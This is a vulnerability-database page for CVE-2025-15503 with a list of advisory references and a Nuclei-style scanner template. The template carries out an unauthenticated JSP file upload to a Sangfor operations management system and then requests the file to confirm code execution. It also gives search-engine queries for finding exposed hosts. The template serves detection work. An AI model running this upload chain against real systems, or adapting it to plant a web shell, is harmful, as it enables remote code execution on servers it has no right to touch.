| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2025-15503 | 10 Jan 202610:00 | – | circl | |
| Sangfor Operation and Maintenance Management System 代码问题漏洞 | 10 Jan 202600:00 | – | cnnvd | |
| CVE-2025-15503 | 10 Jan 202609:02 | – | cve | |
| CVE-2025-15503 Sangfor Operation and Maintenance Management System common.jsp unrestricted upload | 10 Jan 202609:02 | – | cvelist | |
| EUVD-2026-1856 | 10 Jan 202609:02 | – | euvd | |
| CVE-2025-15503 | 10 Jan 202609:15 | – | nvd | |
| CVE-2025-15503 | 10 Jan 202609:15 | – | osv | |
| PT-2026-1780 | 10 Jan 202600:00 | – | ptsecurity | |
| CVE-2025-15503 | 13 Jan 202622:53 | – | redhatcve | |
| VulnCheck KEV: CVE-2025-15503 | 10 Mar 202600:00 | – | vulncheck_kev |
id: CVE-2025-15503
info:
name: Sangfor OSM - Arbitrary File Upload
author: Ark
severity: critical
description: |
Sangfor Operation and Maintenance Management System <= 3.0.8 contains an unrestricted file upload vulnerability caused by manipulation of the \"File\" argument in /fort/trust/version/common/common.jsp, letting remote attackers upload arbitrary files, exploit requires no special privileges.
impact: |
Remote attackers can upload arbitrary files, potentially leading to remote code execution or system compromise.
remediation: |
Update to the latest version.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-15503
- https://github.com/advisories/GHSA-h49h-jpp7-xv85
classification:
cve-id: CVE-2025-15503
epss-score: 0.01907
epss-percentile: 0.77262
cwe-id: CWE-434
metadata:
verified: true
max-request: 2
shodan-query: html:"/fort/login"
fofa-query: body="/fort/login" && product="SANGFOR-运维安全管理系统"
tags: cve,cve2025,sangfor,osm,rce,fileupload,intrusive,vkev
variables:
randnum: "{{rand_int(100000000, 999999999)}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /fort/trust/version/common/common.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp"
Content-Type: image/png
<%@page import="java.security.MessageDigest,java.math.BigInteger"%><%MessageDigest md=MessageDigest.getInstance("MD5");md.update("{{randnum}}".getBytes());out.print(new BigInteger(1,md.digest()).toString(16));new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------WebKitFormBoundary--
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "Upload success")'
condition: and
internal: true
- raw:
- |
GET /fort/trust/version/common/{{randstr}}.jsp HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, md5(to_string(randnum)))'
condition: and
# digest: 4b0a0048304602210084ddeb1285a74c37afaffd9aeb6016b6feb7629655bb395deddb7f4d3c36422202210080c4eed2f2e57915388c3485fc728cb87eaaf62c69482695f197441da4a206a9:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation